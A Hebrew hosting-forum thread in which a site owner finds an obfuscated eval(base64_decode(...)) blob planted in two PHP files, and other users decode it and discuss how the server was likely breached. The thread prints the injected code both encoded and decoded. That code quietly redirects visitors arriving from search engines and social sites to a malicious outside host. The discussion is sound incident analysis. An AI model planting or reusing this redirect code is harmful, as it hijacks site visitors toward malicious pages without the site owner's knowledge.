הוסטס - פורום אחסון האתרים הגדול בישראל - קוד זנודי ומוצפן ש"ושתל" ב2 קבצים בשרת שלי.

- פורום תיכנות (https://hosts.co.il/forums/forumdisplay.php?f=14)

- - קוד זנודי ומוצפן ש"ושתל" ב2 קבצים בשרת שלי. (https://hosts.co.il/forums/showthread.php?t=103471)

קוד זנודי ומוצפן ש"ושתל" ב2 קבצים בשרת שלי.

אהלן,
קיבלתי פנייה מבעל השרת ש2 קבצים אצלי באתר מסויים מכילים וירוס, יש לציין שלא שיניתי כבר למעלה משנה את קבצים אלו.

נכנסתילקבצים ולהפתעתי מצאתי קוד מוצפן, שפשוט הושתל בדף, הנה הקוד:

PHP קוד:


		
			
             eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9iYWdmcm8uZmFydGl0LmNvbS8iKTsKZXhpdCgpOw0KfQp9DQp9DQp9DQp9"));

מישהו יודע איך זה נגרם? האם המחשב שלי מודבק בוירוס? בעיה בשרת?

אשמח לתמיכה..

תודה!

קוד לאחר פיצוח ההצפנה:

PHP קוד:


		
			
error_reporting(0);

$qazplm=headers_sent();

if (!$qazplm){

$referer=$_SERVER['HTTP_REFERER'];

$uag=$_SERVER['HTTP_USER_AGENT'];

if ($uag) {

if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){

if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {

if (!stristr($referer,"cache") or !stristr($referer,"inurl")){

header("Location: http://bagfro.fartit.com/");

exit();

}

}

}

}

}

http://labs.sucuri.net/?details=bagfro.fartit.com

PHP קוד:


		
			
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://bagfro.fartit.com/");
exit();
}
}
}
}
}

כנראה שפרצו לך לשרת ושתלו את זה, הקוד הזה סה"כ עושה הפנייה לכתובת של Dynamic DNS שלך תדע מה הם רוצים לעשות עם מי שנכנס אליהם. אני אישית מקבל Access Forbidden.

מי שמחביא ככה קוד לא עושה עבודה טובה במיוחד, יכול להיות גם שזה בוט אוטומטי שפרץ לך דרך חולשה מוכרת באיזה מערכת מוכנה שיושבת לך על השרת או משהו...

סביר להניח שבעל השרת הוא היחיד שיוכל לבדוק איך ומתי השינויים הללו נעשו, ככה שהייתי מחזיר את השאלה חזרה אליו.

שאלה: איך הצלחת מהקוד המוצפן לעבור לקוד המקורי ?

ציטוט:

נכתב במקור על ידי Rhost (פרסם 875004)

שאלה: איך הצלחת מהקוד המוצפן לעבור לקוד המקורי ?

אין כאן שום הצפנה, זה טקסט המקודד ב- base64 (חפש בגוגל base64 decode ושים באחד הכלים את המחרוזת הזו).

אחלה תודה על אינפורמציה